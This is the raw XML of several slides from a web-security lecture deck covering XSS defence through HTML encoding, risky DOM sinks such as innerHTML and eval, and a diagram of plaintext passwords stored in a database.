              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Easy to find</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Leads to data breaches through spoofing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFFA066-8243-5F4F-8C04-2C3FCB0DC1DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="94000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="919619" y="2076146"/>
            <a:ext cx="5272129" cy="2334800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="55000" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390196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Defending against XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4CF125-C50A-6C41-A2F1-45D7DB8C3C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739454" y="1426718"/>
            <a:ext cx="10996390" cy="5050282"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Input validation ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Neutralize Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Server Pages -&gt; HTML Encoding (Escaping)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt; becomes &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt; becomes &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>" becomes &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScript (DOM XSS)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Dangerous Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Dangerous Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>setInterval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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6209" y="1306797"/>
            <a:ext cx="3189889" cy="4931229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269648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97A-4C58-BE46-ABD7-4B1054FFC074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456156" y="221075"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>HTML Encoding Neutralizes XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CBE68A-BDB1-C848-BC5E-990C8F22B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601" y="1400743"/>
            <a:ext cx="3044869" cy="4931229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F11802E-DB36-F448-A28D-982F051F4B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3590" y="1849841"/>
            <a:ext cx="8413003" cy="3516656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1289470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XSS!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3488076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73D01F-90C3-6647-A718-04D380A25F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="375781"/>
            <a:ext cx="12192000" cy="5866382"/>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5636712"/>
            <a:ext cx="12192000" cy="280102"/>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049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(User input is written into the page as is)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77503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BCF6C-406F-9F4B-85BB-2133B11632AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="293144"/>
            <a:ext cx="12187271" cy="5969870"/>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453703"/>
            <a:ext cx="12192000" cy="279024"/>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29" y="5442558"/>
            <a:ext cx="12192000" cy="280102"/>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546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C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing Encryption of Sensitive Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C86D53-E484-A94C-B33B-6CAD9A8055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0810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507314" y="1431834"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507314" y="2237585"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37DB8B7E-0945-BA4E-92AC-0C5EE259C3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0292" y="4101413"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1565021" y="5104373"/>
            <a:ext cx="617477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Curved Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1122903" y="3350556"/>
            <a:ext cx="1494496" cy="7219"/>
          </a:xfrm>
          <a:prstGeom prst="curved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B146178-72F2-974B-BB4F-8808455E4F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225771" y="1868253"/>
            <a:ext cx="1622851" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72384"/>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75853034-607F-5A46-AF53-671BEBDC74EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144227" y="3655985"/>
            <a:ext cx="2546770" cy="853384"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ABCDEFG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Can 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E31EB4-DA07-574F-AF8A-4C27D3735E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576181" y="1196117"/>
            <a:ext cx="2968668" cy="2304908"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="82000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="50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93290B-35DE-2740-87F9-3E1EBBF4BEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4496981" y="1301835"/>
            <a:ext cx="1058175" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="Table 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2B7407-F54F-8E4E-B55C-FA39C397CFEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3848622" y="1959266"/>
          <a:ext cx="2423786" cy="1097280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="576195">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="839244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008347">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1283997765"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5163</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2642470997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5164</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>eve</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ABCDEFG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="851265560"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5165</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3311727319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29526945-CCB0-3041-B7E9-1015ACB53B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5775" y="4129717"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA615CE2-F4DC-6A4C-9BC9-8B65BB21197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6006986" y="5093131"/>
            <a:ext cx="960391" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Curved Connector 28">
            <a:extLst>
